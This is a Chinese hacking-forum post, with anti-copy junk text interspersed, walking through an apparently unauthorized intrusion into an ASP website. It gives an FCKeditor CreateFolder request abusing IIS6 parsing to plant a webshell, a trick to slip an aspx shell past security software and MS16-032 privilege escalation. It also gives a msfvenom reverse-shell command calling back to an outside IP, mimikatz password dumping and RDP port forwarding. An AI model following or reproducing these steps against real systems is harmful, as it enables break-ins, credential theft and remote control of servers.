找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2371|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- O/ K1 H0 n* |' u0 v9 y

2 J4 `. n1 j' Y2 K: C% B" i1 B% ~2 N( G& [8 ^1 l5 t* A! q, l9 i5 p0 c i7 e* H9 W- X9 S- ^, i7 ~6 P( E- [7 U) P' P& R- f4 T8 {4 [9 i/ h
/ s. I: J' ^* C8 Q& Z- n

8 \8 P" T% @- l5 g
0 V) m$ J/ J0 S* M% [, u3 `" f
一、 利用getwebshell
" ^5 k+ e! T! B
5 { }0 v0 g9 w9 B+ t* W8 j
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
7 b9 {2 P) q6 B, Z
0 S5 A* |- W$ v222.png
) R/ D* u$ ?2 c5 T% ^
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
& V) {& l: e9 O4 d# D# V! J. U333.png
2 ^. G* p# a( u/ n2 x
下面我们构造一个asp目录,如: - V( I5 [4 S- O1 E' {

! E0 M2 u: W" D& z4 ], a

& P2 c( g0 X4 I4 l2 I http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ( e* E; j! T- o- _* I$ b

) a/ h: U5 e& K( n

' [& j: x v1 b" ? 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
% \: Y$ X, h* D5 R1 M/ p/ y
) O9 J9 b9 ?. V+ j8 Y# |
一、 绕过安全狗云锁提权并且加账号
4 K5 ~2 O6 D/ u444.png
8 B) C. N" a6 n- Y' |( ~
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
# E9 n+ |3 g2 U0 v4 G% R
5 e8 }6 r- q# f6 B6 e/ ^
如图:
3 z7 o" X [/ b; V+ M555.png
9 j7 W/ j5 e8 j4 U. ?9 a r
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
& S- A) [5 s- j$ A& E- |8 w( g4 u3 e4 G
( R7 w7 z2 S, @* N
一、 利用metasploit
- }( E* p' t! t
, O7 L3 a0 e* W8 b' s* c
首先用pentestbox生成一个64位的payload如下命令
. `0 ?6 `, p; Z
1 L8 {' {5 j2 O& d3 l G5 v msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
3 x _1 X: }8 R! d- | ~9 ^
2 H3 m! f8 Y0 n5 Y
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
' z' w, }- G0 o5 E8 A+ Z 11.png
+ i |' a5 ~6 |7 f( @
下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
+ {, k- e! ]: F+ ` 13.png
2 u5 `0 f% d+ _
下面我们来做一个监听如下命令:
; U1 d: ?) f7 O/ X# v0 g7 ~8 h
+ x0 m; v% ], Z portfwd add -l 6655 -p 3968 -r 127.0.0.1
,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
2 V. {6 b5 H* S9 ] 18.png
/ m* o7 A/ {8 r: h

9 p* G. L# |' R0 W
' y1 p0 G" i8 l" c4 y( c

8 y9 k" r( W) ?! |

* v: G9 Y& Z. f( e' N1 B
: ?4 M( L9 S+ ?. F b& P
! }' b9 Z0 Q- L6 h7 p$ f! H& t
+ k* L8 H% v. o$ e. h/ g

. R F0 d! M7 h! z& H R* X+ D
4 p: L" ^5 _4 N * w9 t+ J+ c% f- ^. ]% ?3 M

, A. n% d4 W: T# c. V: @8 n* f
/ z- w; L' D$ {

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表